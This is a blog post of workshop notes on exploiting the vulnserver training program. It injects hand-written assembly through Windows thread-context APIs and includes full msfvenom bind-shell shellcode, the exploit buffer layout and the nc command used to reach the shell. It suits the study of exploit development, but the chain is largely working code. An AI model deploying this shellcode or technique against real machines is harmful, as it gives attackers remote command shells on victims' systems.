PUSH EBX

The next argument is lpBuffer.

Since we're copying the PoC shellcode from the stack into the allocated memory, pick a source address slightly before the shellcode to be safe. Ideally it should be a few bytes earlier, inside the NOP sled.

How to measure the distance?

The generated msfvenom payload starts with "DA D7". Check where this sits on the stack; for example, the value BAD7DA90 is stored at the address 017BFC30. Double click that address, then scroll up to see how far it is from the top of the stack. The top of the stack, where the ESP register points, is memory address 017BF99C and contains the value 01F4. The debugger shows that the distance (offset) between the selected address and the top of the stack is 274.

MOV EBX,ESP
ADD BX,274
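With the example addresses quoted above, the effect of these two instructions can be worked out by hand or with a sketch like the one below. It assumes the offset 274 is hexadecimal, as debuggers usually display it, and the helper name add_bx is hypothetical. Note that ADD BX only touches the low 16 bits of EBX.

```python
def add_bx(ebx, imm):
    """Emulate ADD BX,imm: add to the low 16 bits of EBX, discarding any carry."""
    return (ebx & 0xFFFF0000) | ((ebx + imm) & 0xFFFF)

esp = 0x017BF99C           # top of the stack in this example
shellcode_at = 0x017BFC30  # where the DA D7 ... bytes were found

source = add_bx(esp, 0x274)
print(hex(source), hex(shellcode_at - source))
```

Under that assumption the copy would start 0x20 bytes before the PoC shellcode, which is consistent with aiming for the NOP sled.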

Push all the remaining arguments to the stack:

PUSH EBX
PUSH EBP
PUSH ESI

Call WriteProcessMemory API:

MOV EBX,kernel32.WriteProcessMemory
CALL EBX

To confirm the operation succeeded, clear the 160000 in the Windbg Memory window and retype it to refresh the data. The memory should no longer be all zeros.


Step 4 - Get the EIP register value in the primary thread

Type the tilde character ~ in the Windbg Command window. This lists the threads, where 0 is the primary thread.

The GetThreadContext API will be used here:

BOOL GetThreadContext(
  HANDLE    hThread,
  LPCONTEXT lpContext
);

lpContext points to the context structure, which is large, so it should be placed well away from the data we still need on the stack.

Within the context structure, the ContextFlags value should be 0x10001, which is the sum of:

  • 0x10000: indicates the 32-bit x86 architecture (CONTEXT_i386)
  • 0x00001: requests the control registers, which include EIP (combined with CONTEXT_i386 this is CONTEXT_CONTROL)

We'll choose an offset of 0x150 below ESP, for example, so that when the API fills in the structure it does not overwrite existing data on the stack.

MOV EBX, ESP
SUB BX,150

Create the value 0x10001 in ECX without using null bytes:

XOR ECX,ECX
MOV CX,0FFFF
INC ECX <--- 0FFFF + 1 = 10000
INC ECX <--- 10000 + 1 = 10001
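The same sequence can be replayed in a few lines to confirm that it ends at the intended ContextFlags value. A minimal sketch, with build_context_flags as a hypothetical helper name:

```python
CONTEXT_i386 = 0x00010000
CONTROL_BIT = 0x00000001

def build_context_flags():
    """Replay XOR ECX,ECX / MOV CX,0FFFF / INC ECX / INC ECX."""
    ecx = 0                              # XOR ECX,ECX
    ecx = (ecx & 0xFFFF0000) | 0xFFFF    # MOV CX,0FFFF (low 16 bits only)
    ecx = (ecx + 1) & 0xFFFFFFFF         # INC ECX -> 0x10000
    ecx = (ecx + 1) & 0xFFFFFFFF         # INC ECX -> 0x10001
    return ecx

flags = build_context_flags()
print(hex(flags), flags == (CONTEXT_i386 | CONTROL_BIT))
```

Loading 0x10001 with a plain MOV ECX would put two null bytes in the instruction, which is why the value is reached by incrementing instead.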

Store the value of ECX (0x10001) at the memory address held in EBX, which is the ContextFlags field at the start of the structure.

MOV DWORD PTR DS:[EBX],ECX

Push EBX. This is the lpContext argument, which goes first because it is the last parameter:

PUSH EBX

Push the next argument, hThread (stored in EDI earlier):

PUSH EDI

Call the API:

MOV EBX,kernel32.GetThreadContext
CALL EBX

Step 5 - Change EIP register value into the allocated memory address.

Now that the EIP register value has been retrieved via GetThreadContext, SetThreadContext can be used to set the value of EIP:

BOOL SetThreadContext(
  HANDLE        hThread,
  const CONTEXT *lpContext
);

In the debugger, double click the address of the stack and scroll up to where the thread's saved EIP value is stored; here it is at an offset of 98 from the top of the stack.

MOV ECX,ESP
SUB CL,98
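The offset of 98 can be cross-checked against the layout of the 32-bit CONTEXT structure. The sketch below lists the fields up to Eip with their sizes, as I understand the x86 definition in winnt.h, and computes where Eip falls when the structure starts 0x150 below ESP. The helper name field_offset is an assumption.

```python
# 32-bit CONTEXT fields up to Eip, with sizes in bytes.
CONTEXT_FIELDS = [
    ("ContextFlags", 4),
    ("Dr0", 4), ("Dr1", 4), ("Dr2", 4), ("Dr3", 4), ("Dr6", 4), ("Dr7", 4),
    ("FloatSave", 112),  # FLOATING_SAVE_AREA: 7 DWORDs + 80-byte register area + 1 DWORD
    ("SegGs", 4), ("SegFs", 4), ("SegEs", 4), ("SegDs", 4),
    ("Edi", 4), ("Esi", 4), ("Ebx", 4), ("Edx", 4), ("Ecx", 4), ("Eax", 4),
    ("Ebp", 4),
    ("Eip", 4),
]

def field_offset(name):
    """Return the byte offset of a field from the start of the structure."""
    offset = 0
    for field, size in CONTEXT_FIELDS:
        if field == name:
            return offset
        offset += size
    raise KeyError(name)

eip_offset = field_offset("Eip")
distance_below_esp = 0x150 - eip_offset
print(hex(eip_offset), hex(distance_below_esp))
```

So the address ESP - 0x98 is exactly the Eip slot of the structure that GetThreadContext filled in.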

Write EBP, which contains the start address of the allocated memory (160000), into that location:

MOV DWORD PTR DS:[ECX],EBP

EBX was overwritten when the API address was loaded into it, so I have to point it at the context structure again:

MOV EBX,ESP
SUB BX,150

Push the two arguments for SetThreadContext and call the API:

PUSH EBX
PUSH EDI
MOV EBX,kernel32.SetThreadContext
CALL EBX

In the Windbg Command window, type the following command. "e" executes a command and "r" displays the registers, here for the primary thread 0.

~0 e r

Check the value of the EIP register to confirm that it was successfully overwritten with 160000.


Step 6 - Resume the thread to execute the bind shell.

The ResumeThread API accepts only one argument, the thread handle:

DWORD ResumeThread(
  HANDLE hThread
);

Push this to the stack and call the API:

PUSH EDI
MOV EBX,kernel32.ResumeThread
CALL EBX

In the Windbg Command window, type "g" to continue execution, so that the resumed thread runs the instructions at the memory address pointed to by the EIP register. This executes the PoC shellcode, and a calculator window should pop up at this point.


Step 7 - Terminate vulnserver.exe

If I call the ExitProcess API here, it will exit the vulnserver process and make port 9999 available again.

Before that, it's recommended to have our cmd.exe process call the Sleep API and sleep for 5 seconds, so that the vulnserver process has enough time to exit and release port 9999:

void Sleep(
  DWORD dwMilliseconds
);

Scroll down the stack and find a spot in the NOP sled close to the bind shellcode to place the instructions that call the Sleep API:

XOR ECX,ECX
MOV CL,88 
MOV CH,13 # hex value 0x1388 (5000 in decimal)
PUSH ECX
MOV EBX,kernel32.Sleep
CALL EBX
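The two bytes loaded into CH and CL are just the high and low bytes of the 5000 millisecond delay. A short sketch of that split, with split_word as a hypothetical helper name:

```python
def split_word(value):
    """Split a 16-bit value into (high byte, low byte), i.e. (CH, CL)."""
    if not 0 <= value <= 0xFFFF:
        raise ValueError("value does not fit in 16 bits")
    return value >> 8, value & 0xFF

ch, cl = split_word(5000)  # 5 seconds in milliseconds
print(hex(ch), hex(cl), hex((ch << 8) | cl))
```

Neither byte is zero, so this delay can be loaded without introducing a null byte; a value such as 4096 (0x1000) would need a different approach.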

Remember to put some padding between Sleep and Bind Shell:

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10+ payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + sleep + "\x90"*10 + calc_shell

Time to call the ExitProcess API:

void ExitProcess(
  UINT uExitCode
);

Give uExitCode a value of zero:

XOR ECX,ECX
PUSH ECX
MOV EBX,kernel32.ExitProcess
CALL EBX 

Run the exploit and check that it pops the calculator after sleeping for 5 seconds. If everything works, we can replace the PoC payload so that, instead of popping calc, it creates a bind shell that accepts connections on port 9999, which the vulnserver process has released by then.

Generate the shellcode for the bind shell and assign it to a variable in the script.

 msfvenom -a x86 -platform Windows -p windows/shell_bind_tcp LPORT=9999 -e x86/shikata_ga_nai -b "\x00" -f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"\xbb\x80\x9d\xd1\x48\xdb\xd4\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x53\x31\x5a\x12\x83\xea\xfc\x03\xda\x93\x33\xbd\x26\x43\x31"
"\x3e\xd6\x94\x56\xb6\x33\xa5\x56\xac\x30\x96\x66\xa6\x14\x1b"
"\x0c\xea\x8c\xa8\x60\x23\xa3\x19\xce\x15\x8a\x9a\x63\x65\x8d"
"\x18\x7e\xba\x6d\x20\xb1\xcf\x6c\x65\xac\x22\x3c\x3e\xba\x91"
"\xd0\x4b\xf6\x29\x5b\x07\x16\x2a\xb8\xd0\x19\x1b\x6f\x6a\x40"
"\xbb\x8e\xbf\xf8\xf2\x88\xdc\xc5\x4d\x23\x16\xb1\x4f\xe5\x66"
"\x3a\xe3\xc8\x46\xc9\xfd\x0d\x60\x32\x88\x67\x92\xcf\x8b\xbc"
"\xe8\x0b\x19\x26\x4a\xdf\xb9\x82\x6a\x0c\x5f\x41\x60\xf9\x2b"
"\x0d\x65\xfc\xf8\x26\x91\x75\xff\xe8\x13\xcd\x24\x2c\x7f\x95"
"\x45\x75\x25\x78\x79\x65\x86\x25\xdf\xee\x2b\x31\x52\xad\x23"
"\xf6\x5f\x4d\xb4\x90\xe8\x3e\x86\x3f\x43\xa8\xaa\xc8\x4d\x2f"
"\xcc\xe2\x2a\xbf\x33\x0d\x4b\x96\xf7\x59\x1b\x80\xde\xe1\xf0"
"\x50\xde\x37\x6c\x58\x79\xe8\x93\xa5\x39\x58\x14\x05\xd2\xb2"
"\x9b\x7a\xc2\xbc\x71\x13\x6b\x41\x7a\x3c\x63\xcc\x9c\x28\x6b"
"\x98\x37\xc4\x49\xff\x8f\x73\xb1\xd5\xa7\x13\xfa\x3f\x7f\x1c"
"\xfb\x15\xd7\x8a\x70\x7a\xe3\xab\x86\x57\x43\xbc\x11\x2d\x02"
"\x8f\x80\x32\x0f\x67\x20\xa0\xd4\x77\x2f\xd9\x42\x20\x78\x2f"
"\x9b\xa4\x94\x16\x35\xda\x64\xce\x7e\x5e\xb3\x33\x80\x5f\x36"
"\x0f\xa6\x4f\x8e\x90\xe2\x3b\x5e\xc7\xbc\x95\x18\xb1\x0e\x4f"
"\xf3\x6e\xd9\x07\x82\x5c\xda\x51\x8b\x88\xac\xbd\x3a\x65\xe9"
"\xc2\xf3\xe1\xfd\xbb\xe9\x91\x02\x16\xaa\xa2\x48\x3a\x9b\x2a"
"\x15\xaf\x99\x36\xa6\x1a\xdd\x4e\x25\xae\x9e\xb4\x35\xdb\x9b"
"\xf1\xf1\x30\xd6\x6a\x94\x36\x45\x8a\xbd";

Final test

Exit the debugger, run vulnserver on the victim machine, then run the exploit script in Kali.

After 5 seconds, connect to the remote machine on port 9999 and you should get the Windows bind shell:

nc 172.16.202.133 9999

Here's the complete exp.py file: https://drive.google.com/file/d/1lqnOAvZAnDs4fvJqaYSU20l-DcXMqqmH/view or https://pastebin.com/fAh45H3T


Thoughts

It was a fun hands-on workshop that let me practice some advanced pentest techniques, writing shellcode and debugging. It requires a basic understanding of buffer overflows and of the registers used in assembly language as prerequisite knowledge.

Arnold was a very patient instructor and helped participants of varying skill levels understand the concepts.

As a disclaimer, I might have skipped some steps or explanations in this post; it was never meant to be a thorough walkthrough. It only serves as my personal notes so that I can remember what I learned during the workshop.

Please read the original tutorial on Anthony's blog for a more holistic view of the technique, and feel free to contact him if you wish to attend similar workshops in the future.

This post is also available on DEV.